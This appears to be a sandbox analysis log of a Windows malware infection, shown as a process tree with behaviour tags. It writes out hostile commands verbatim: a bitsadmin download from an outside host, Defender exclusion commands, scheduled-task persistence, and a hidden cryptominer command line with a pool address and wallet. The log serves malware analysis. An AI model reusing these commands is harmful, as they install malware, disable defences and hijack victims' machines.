C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵
- Checks for any installed AV software in registry
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z14⤵
- Download via BitsAdmin
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfT5WYVqWlNx1lAe -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
- Drops file in Program Files directory
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pSEpyyqJOWlXpayv -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AqDFSDlmWiui\AqDFSDlmWiui.dll" AqDFSDlmWiui14⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AqDFSDlmWiui\AqDFSDlmWiui.dll" AqDFSDlmWiui15⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵
-
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT14⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aocenda5.m35\installer.exe /qn CAMPAIGN=654 & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\aocenda5.m35\installer.exeC:\Users\Admin\AppData\Local\Temp\aocenda5.m35\installer.exe /qn CAMPAIGN=65413⤵
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Twk74K5tf2RNDMdeHMLEJv3g.exe"C:\Users\Admin\Pictures\Adobe Films\Twk74K5tf2RNDMdeHMLEJv3g.exe" silent8⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Pictures\Adobe Films\bo5pmCap6uvDHfHJN3UgwaJy.exe"C:\Users\Admin\Pictures\Adobe Films\bo5pmCap6uvDHfHJN3UgwaJy.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\WPWSLBK9XTV3JK3FvDUtGufX.exe"C:\Users\Admin\Pictures\Adobe Films\WPWSLBK9XTV3JK3FvDUtGufX.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\RIp6KOn6bTquopPdWGDEO8OZ.exe"C:\Users\Admin\Pictures\Adobe Films\RIp6KOn6bTquopPdWGDEO8OZ.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\RkZLuBmhzDRH1tonlD2y9chm.exe"C:\Users\Admin\Pictures\Adobe Films\RkZLuBmhzDRH1tonlD2y9chm.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 2367⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\B3xGPO7uW7v2ADymt3FoIKP9.exe"C:\Users\Admin\Pictures\Adobe Films\B3xGPO7uW7v2ADymt3FoIKP9.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\bWLj9lfauqRfDndQtgrXhtd9.exe"C:\Users\Admin\Pictures\Adobe Films\bWLj9lfauqRfDndQtgrXhtd9.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\YY4xjF_W3oy_kHfCFkzkO1C7.exe"C:\Users\Admin\Pictures\Adobe Films\YY4xjF_W3oy_kHfCFkzkO1C7.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\YY4xjF_W3oy_kHfCFkzkO1C7.exe"C:\Users\Admin\Pictures\Adobe Films\YY4xjF_W3oy_kHfCFkzkO1C7.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\hQVevJHT7ifZkZy5q0HwRySe.exe"C:\Users\Admin\Pictures\Adobe Films\hQVevJHT7ifZkZy5q0HwRySe.exe"6⤵
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
C:\Users\Admin\AppData\Local\Temp\f6e602fb-b513-419e-91ea-f37c59ced19d\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\f6e602fb-b513-419e-91ea-f37c59ced19d\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\f6e602fb-b513-419e-91ea-f37c59ced19d\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\f6e602fb-b513-419e-91ea-f37c59ced19d\test.bat"8⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hQVevJHT7ifZkZy5q0HwRySe.exe" -Force7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\hQVevJHT7ifZkZy5q0HwRySe.exe"C:\Users\Admin\Pictures\Adobe Films\hQVevJHT7ifZkZy5q0HwRySe.exe"7⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hQVevJHT7ifZkZy5q0HwRySe.exe" -Force7⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6304 -s 24687⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\SGQDazRjK3dj9h5PYpsGlAad.exe"C:\Users\Admin\Pictures\Adobe Films\SGQDazRjK3dj9h5PYpsGlAad.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\iHWTBUxIpQQ2V0wNGbIoQRfC.exe"C:\Users\Admin\Pictures\Adobe Films\iHWTBUxIpQQ2V0wNGbIoQRfC.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\RRLzwWRhJ6iHLobR1jUETLpO.exe"C:\Users\Admin\Pictures\Adobe Films\RRLzwWRhJ6iHLobR1jUETLpO.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\RRLzwWRhJ6iHLobR1jUETLpO.exe"C:\Users\Admin\Pictures\Adobe Films\RRLzwWRhJ6iHLobR1jUETLpO.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\Pictures\Adobe Films\B6nS5AmiDzBtFr8R73VmDVKW.exe"C:\Users\Admin\Pictures\Adobe Films\B6nS5AmiDzBtFr8R73VmDVKW.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\4866014.scr"C:\Users\Admin\AppData\Roaming\4866014.scr" /S7⤵
-
-
C:\Users\Admin\AppData\Roaming\7641623.scr"C:\Users\Admin\AppData\Roaming\7641623.scr" /S7⤵
-
-
C:\Users\Admin\AppData\Roaming\6482018.scr"C:\Users\Admin\AppData\Roaming\6482018.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\8270222.scr"C:\Users\Admin\AppData\Roaming\8270222.scr" /S7⤵
- Suspicious behavior: SetClipboardViewer
-
-
C:\Users\Admin\AppData\Roaming\8104654.scr"C:\Users\Admin\AppData\Roaming\8104654.scr" /S7⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon209b3da1556b9a317.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon209b3da1556b9a317.exeMon209b3da1556b9a317.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 2408⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\2512986.scr"C:\Users\Admin\AppData\Roaming\2512986.scr" /S8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\8167987.scr"C:\Users\Admin\AppData\Roaming\8167987.scr" /S8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\1092981.scr"C:\Users\Admin\AppData\Roaming\1092981.scr" /S8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\7365935.scr"C:\Users\Admin\AppData\Roaming\7365935.scr" /S8⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
-
C:\Users\Admin\AppData\Roaming\5472694.scr"C:\Users\Admin\AppData\Roaming\5472694.scr" /S8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 2449⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-3Q2A4.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-3Q2A4.tmp\setup.tmp" /SL5="$601FE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-SV2IC.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-SV2IC.tmp\setup.tmp" /SL5="$3026A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT10⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-EIMN7.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-EIMN7.tmp\postback.exe" ss111⤵
- Executes dropped EXE
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20b6f9d5bd03a305.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon20b6f9d5bd03a305.exeMon20b6f9d5bd03a305.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon2083f8d8970a0b2d.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon2083f8d8970a0b2d.exeMon2083f8d8970a0b2d.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 3246⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon206d48916f93c5.exe4⤵
- Suspicious use of WriteProcessMemory
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon206d48916f93c5.exeMon206d48916f93c5.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1378103.scr"C:\Users\Admin\AppData\Roaming\1378103.scr" /S2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\2303097.scr"C:\Users\Admin\AppData\Roaming\2303097.scr" /S2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\6821963.scr"C:\Users\Admin\AppData\Roaming\6821963.scr" /S2⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Roaming\7406868.scr"C:\Users\Admin\AppData\Roaming\7406868.scr" /S2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2912 -ip 29121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2008 -ip 20081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2200 -ip 22001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 4482⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 2306010a9752f376cff4bbee56aa08eb c4QZvIvDlEangE8xJGiw+w.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5560 -ip 55601⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3504 -ip 35041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1044 -ip 10441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5388 -ip 53881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1176 -ip 11761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5888 -ip 58881⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 5652 -ip 56521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5588 -ip 55881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5496 -ip 54961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6304 -ip 63041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 6748 -ip 67481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6676 -ip 66761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4048 -ip 40481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7400 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 7400 -ip 74001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 2306010a9752f376cff4bbee56aa08eb c4QZvIvDlEangE8xJGiw+w.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 17256 -ip 172561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Enumerates connected drives
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2BD5B51E5FB79DAB96DE58E5197C803E C2⤵
- Loads dropped DLL
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3EAE137EAA3C8E5C691D5390F70C9A3B C2⤵
- Loads dropped DLL
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8DF38514A89FAFA7EE1824524B7E6B942⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\RequiredApplication_1\Calculator%20Installation.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\RequiredApplication_1\Calculator%20Installation.exe" -silent=1 -CID=764 -SID=764 -submn=default3⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--oYd2f1"4⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x208,0x20c,0x210,0x1e4,0x214,0x7ff8e63fdec0,0x7ff8e63fded0,0x7ff8e63fdee05⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff61bfc9e70,0x7ff61bfc9e80,0x7ff61bfc9e906⤵
-
-
-
